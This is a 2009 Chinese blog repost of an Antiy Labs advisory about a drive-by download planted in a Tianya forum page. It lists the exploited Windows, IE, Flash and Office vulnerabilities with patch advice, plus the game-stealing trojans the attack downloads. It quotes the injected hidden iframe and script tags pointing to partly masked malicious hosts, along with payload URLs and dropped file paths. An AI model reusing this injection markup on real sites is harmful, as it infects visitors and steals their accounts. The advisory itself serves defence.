注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

苗得雨:网事争锋

我们在攻击邪恶和黑暗时要毫不留情,但是也要腾出时间来为善行鼓掌,为光明喝彩!

 
 
 

日志

 
 

安天监控到天涯社区挂马  

2009-08-12 09:11:46|  分类: 网络安全专栏 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

    2009年8月11日下午15时,安天实验室发现,天涯社区页面(http://cache.tianya.cn/publicforum/Content/music/1/123173.shtml),被黑客植入恶意代码,用户如果访问访问该页面,系统会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

天涯社区挂马页面:

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋<iframe SRC=http://www.hiends***.com/songf/newage600.htm width=100% height=16000 frameborder=0 scrolling=no ></iframe>

http://www.hiends***.com/songf/newage600.htm问题框架代码:

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋两条恶意链接最终的挂马页面内容相同,这里只跟踪其中一条链接

<script src=http://badf3***.cn></script>

http://badf3***.cn>问题框架代码:

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋<iframe src=http://zyfx605***.cn/dszq/3.htm width=100 height=0></iframe>

http://zyfx605***.cn/dszq/3.htm问题框架代码:

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋<iframe src=http://f3jiy***.cn/x3/xx.html width=111 height=0 border=0></iframe>

http://f3jiy***.cn/x3/xx.html问题框架代码:

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋

 

该挂马网页利用以下漏洞进行传播:
MS06-014漏洞
MS09-032漏洞
MS09-002漏洞
Adobe Flash Player SWF文件漏洞
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit
漏洞信息与描述:
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码(MS06-014)
受影响系统:
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows 98
Microsoft Windows 98 Second Edition (SE)、
Microsoft Windows Millennium Edition (ME)
Microsoft Windows 2000 Service Pack 4
描述和解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
Microsoft Internet Explorer未初始化的内存损坏漏洞(MS09-002)
受影响版本:
Microsoft Internet Explorer 7.0
解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx
MS09-002 IE7 漏洞原理分析:
链接:http://www.antiy.com/cn/security/2009/s090220_002.htm
Microsoft DirectShow MPEG2溢出漏洞(MS09-032)
受影响系统:
Windows XP Service Pack 2 和 Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP2(用于基于 Itanium 的系统)
解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-032.mspx
Adobe Flash Player SWF文件漏洞
受影响版本:
Adobe Flash Player 9.0.115.0以及以前的版本
解决方案:
Adobe已经发布了安全公告和相应补丁:
链接:http://www.adobe.com/support/security/bulletins/apsb08-11.html
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit
受影响版本:
Microsoft Office Web Components 10
临时解决方法:
为clsid: 0002E551-0000-0000-C000-000000000046设置kill-bit。
解决方案:
目前微软官方还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
http://www.microsoft.com/china/technet/security/
当用户访问挂马网站,系统会自动下载病毒文件:
1、网页木马直接下载的病毒文件:
http://d.nkwxs***.com/xx/x3.css 病毒名:Trojan/Win32.Mudrop.cmf[Dropper]
病毒描述:下载者木马
衍生文件:
c:\Documents and Settings\a\Local Settings\Temp\~53635.t
c:\Documents and Settings\a\Local Settings\Temp\~55801.tmp
c:\Documents and Settings\a\Local Settings\Temp\~55800.tmp
c:\Documents and Settings\a\Recent\x3.css.lnk
2、下载者木马读取下载列表地址:
http://txt.ioxxk***.com/xx.txt
3、由下载者木马下载的其他病毒文件:
http://www.pakkw***.com/img/1.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:梦幻西游online盗号木马
衍生文件:
c:\WINDOWS\Fonts\CcKKcpwJmND4.Ttf
c:\WINDOWS\Fonts\jUxfqJDwmfQEHcy2.fon

http://www.pakkw***.com/img/2.exe 病毒名:Trojan/Win32.Magania.btwn[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\emHnPuBAaF7XjuXBbdxSg.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\WD7eC3pJvgmYQYNwrVP.Ttf

http://www.pakkw***.com/img/3.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\xg4hAPNygs29.dll
c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://www.pakkw***.com/img/4.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\WcCtgJ4zcxHF.dll
c:\WINDOWS\Fonts\CSzZ3gVtf.Ttf

http://www.pakkw***.com/img/5.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\MV3ArsBMAPjxBcRuu.dll
c:\WINDOWS\Fonts\jFwbmsUefPJv9F.Ttf

http://www.pakkw***.com/img/6.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Q9q2MHJ3uTBErM7wc.dll
c:\WINDOWS\Fonts\GD9xUjmZ8vHS5Vj.Ttf

http://www.pakkw***.com/img/7.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\w7uds3zyayg9.dll
c:\WINDOWS\Fonts\gfq7ymgpkp.Ttf

http://www.pakkw***.com/img/8.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\a4rxQxCvNBMNnpqs.dll
c:\WINDOWS\Fonts\Rfs3DRdsUfkma5.Ttf

http://www.pakkw***.com/img/9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\76B9BA7A.dll
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf

http://www.pakkw***.com/img/10.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:梦幻西游online盗号木马
衍生文件:
c:\WINDOWS\system32\Qh6xX7VN48sVPnK.dll
c:\WINDOWS\Fonts\CcKKcpwJmND4.Ttf

http://www.pakkw***.com/img/11.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:完美世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://www.pakkw***.com/img/12.exe 病毒名:Trojan/Win32.Slefdel.dzt
病毒描述:后门类木马
衍生文件:
c:\WINDOWS\71M.exe

http://www.pakkw***.com/img/13.exe 病毒名:Trojan/Win32.Slefdel.dzq
病毒描述:后门类木马
衍生文件:
c:\WINDOWS\71C.exe

http://www.pakkw***.com/img/14.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\CSzZ3gVtf.Ttf
c:\WINDOWS\Fonts\zEfE48cw9EmcFaR.fon

http://www.pakkw***.com/img/15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://www.pakkw***.com/img/16.exe 病毒名:Trojan/Win32.Small.bub
病毒描述:木马下载器
衍生文件:
c:\WINDOWS\Tasks\1

http://www.pakkw***.com/img/17.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ZZZCz7d8yS9vy.dll
c:\WINDOWS\Fonts\VnX3UKKVWKSSVqZW.Ttf

http://www.pakkw***.com/img/18.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://www.pakkw***.com/img/19.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf
c:\WINDOWS\Fonts\A97CRaCB.fon

http://www.pakkw***.com/img/20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:诛仙游戏盗号木马
衍生文件:
c:\WINDOWS\system32\rfpz9wwyy2np.dll
c:\WINDOWS\Fonts\vztr58qstaca8y8j.Ttf

http://www.pakkw***.com/img/21.exe 病毒名:Trojan/Win32.Agent.adxr[Dropper]
病毒描述:IPC$共享传播木马,溢出成功后连接ttp://d.nkwxs.com/xx.exe下载木马
衍生文件:
c:\Documents and Settings\a\Local Settings\Temp\11231237

http://www.pakkw***.com/img/22.exe 病毒名:Trojan/Win32.OnLineGames.bmnc[GameThief]
病毒描述:QQ盗号木马
衍生文件:
c:\Program Files\Internet Explorer\D9.dll
c:\Program Files\Internet Explorer\D9.tmp
c:\Program Files\Internet Explorer\E.bak
安天反病毒工程师建议:
1. 使用安天防线2009或锐甲可以有效防范此挂马网页。

安天监控到天涯社区挂马 - 苗得雨 - 苗得雨:网事争锋

2. 用安天防线2009可以查杀此挂马网页下载的病毒文件。
3、请及时更新安天防线2009,以确保您的计算机安全,防止计算机病毒入侵。如未安装安天防线请<>

  评论这张
 
阅读(165)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017